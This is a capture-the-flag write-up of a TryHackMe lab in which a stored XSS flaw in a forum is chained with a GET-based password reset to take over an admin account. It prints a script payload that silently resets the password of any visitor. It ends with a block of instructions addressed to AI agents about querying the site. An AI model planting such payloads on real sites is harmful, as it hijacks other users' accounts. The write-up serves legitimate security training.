# \[Day 5] Pesky Elf Forum

## Story

The Elf Forum is where all the elves express their joy and excitement about Christmas, but Grinch Enterprises has one bad admin account, and they've installed a plugin that changes all mentions of Christmas to Buttmas!! McSkidy needs to find that admin account and disable the plugin.

## Challenge

![](/files/DAvzIOqQUjHt0OwThaiD)

Logging in with the given credentials returns the following.

```
Username: McSkidy

Password: password
```

![](/files/yuoTGa79GshT9n2eQ330)

Visiting the settings page reveals a password reset feature.

![](/files/lwbFapPLCrCCVrFDdgLF)

Posting the following as a comment reveals that the platform is vulnerable to stored XSS attacks. and any payload posted as a comment will run when another user accesses the page. 

```
<script>alert(1)</script>
```

![](/files/WLl03woy4T4e7qKNoFu6)

![](/files/SxgRZarpNcktUCb4JGl1)

Now I needed to chain this stored XSS with a password reset attack against the `grinch` account and I should be able to get in. The password reset is revealed when trying to change the password

```
http://10.10.31.34/settings?new_password=nee
```

![](/files/nuu869FnBxK5bs19pkCa)

Next, I posted a comment with the following contents to change the password of any visitor that visits that thread to `neewashere`

```
<script>fetch('/settings?new_password=neewashere');</script>
```

![](/files/x9NAUGcHnVyj694D6Y58)

After waiting for about a minute or so, I was able to login to the `grinch` account with `neewashere` as the password. I was also able to see the active plugin and disable it.

![](/files/F81HR7hAF8mpSLa2UOA0)

![](/files/oJj3alyLmWzs4IRIUnyR)

![](/files/6Mrfz755YvFcB3UBXzG5)

{% hint style="success" %}
What flag did you get when you disabled the plugin?

* THM{NO\_MO\*\***\_**\*\*\*\*\*}
  {% endhint %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://repo.4pfsec.com/tryhackme/advent-of-cyber-3-2021/day-5-pesky-elf-forum.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.